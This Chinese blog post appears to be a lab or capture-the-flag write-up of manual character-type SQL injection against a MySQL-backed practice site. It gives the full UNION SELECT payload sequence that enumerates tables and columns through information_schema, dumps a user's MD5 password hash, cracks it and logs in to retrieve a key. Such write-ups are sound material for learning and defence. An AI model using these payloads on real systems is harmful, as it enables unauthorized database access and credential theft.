SQL手工注入漏洞测试(MySQL数据库-字符型)——漏洞记录
2021/7/16 19:08:15
本文主要是介绍SQL手工注入漏洞测试(MySQL数据库-字符型)——漏洞记录,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
一进来看到一个停机公告,点开查看
发现链接中有字符参数,怀疑存在字符型注入
输入 ' and '1'='1 和 ' and '1'='2 测试是否存在注入 ' and '1'='1
' and '1'='2
发现当输入 'and '1'='2 时,网页发生了错误,确认存在注入。
通过order by 子句判断字段数
order by 1
order by 2
order by 5
order by 4
当order by 4 时网页正常响应,by 5时发生错误,说明存在4个字段。
判断回显位置。
通过union select 判断回显位置。
id=1' union select 1,2,3,4--+
回显位置为 2 和 3
爆当前数据库 id=1' union select 1,2,database(),4--+
得到数据库是 mozhe_discuz_stormgroup
爆表名 id=1' union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema like database()--+
得到数据表为 notice,stormgroup_member
爆列名 id=1' union select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema like database() and table_name like 'stormgroup_member'--+
得到列名为 id,name,password,status
爆内容
爆出name,password,status的内容
id=1' union select 1,2,group_concat(name,',',password,',',status),4 from stormgroup_member--+
得到 name 为 mozhe , password 为 e804b0037bec0607a82e7be037e2e51d
password是个md5值,在md5在线解密网站上解密
密码为 196397
利用得到的账号密码登录
得到key mozhec2b968ab2172fe26c724b10d8b2
这篇关于SQL手工注入漏洞测试(MySQL数据库-字符型)——漏洞记录的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-11-20部署MySQL集群入门:新手必读指南
- 2024-11-20部署MySQL集群教程:初学者指南
- 2024-11-20部署MySQL集群项目实战:新手教程
- 2024-11-20部署MySQL集群资料:新手入门教程
- 2024-11-20MySQL集群部署教程:入门级详解
- 2024-11-20MySQL集群教程:入门与实践指南
- 2024-11-20部署MySQL集群教程:新手入门指南
- 2024-11-20MySQL读写分离教程:轻松入门
- 2024-11-20部署MySQL集群入门:一步一步搭建你的数据库集群
- 2024-11-19部署MySQL集群学习:入门教程